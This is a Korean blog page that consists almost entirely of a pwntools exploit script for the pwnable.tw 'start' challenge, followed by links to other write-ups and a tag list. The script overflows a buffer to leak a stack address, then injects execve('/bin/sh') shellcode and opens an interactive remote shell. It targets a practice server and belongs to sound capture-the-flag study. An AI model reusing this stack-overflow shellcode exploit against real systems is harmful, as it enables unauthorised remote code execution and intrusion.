티스토리 뷰
from pwn import *
#s = process("./start")
s = remote('chall.pwnable.tw', 10000)
context.log_level = 'debug'
s.recv()
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"
payload = "A"*20
payload += p32(0x8048087)
#payload += p32(0x8048060)
s.send(payload)
leak_stack=u32(s.recv(4))
log.success(hex(leak_stack))
payload = "A"*20
payload += p32(leak_stack+20)
payload += shellcode
s.recv()
s.send(payload)
s.interactive()
'pwnable > pwnable.tw' 카테고리의 다른 글
| [pwnpwnpwn-5] pwnable.tw tcache_tear (0) | 2020.01.12 |
|---|---|
| [pwnpwnpwn-1] pwnable.tw seethefile (0) | 2019.12.22 |
| [pwnable.tw] silver_bullet write-up (0) | 2018.09.29 |
| [pwnable.tw] hacknote write-up (0) | 2018.08.19 |
| [pwnable.tw] orw write-up (0) | 2018.08.19 |
Comments
최근에 올라온 글
최근에 달린 댓글
TAG
- TLS
- FSB
- tcache
- srop
- glibc
- overflow
- fastbin
- ebp change
- fsop
- heap
- oob
- rt_sigreturn
- 본선가고싶다
- shellcoding
- stack reusing
- pwnable.tw
- fastbindup
- exit
- codegate
- HackCTF
- SQLi
- hacking
- pwable
- pwnable
- 해킹
- Total
- Today
- Yesterday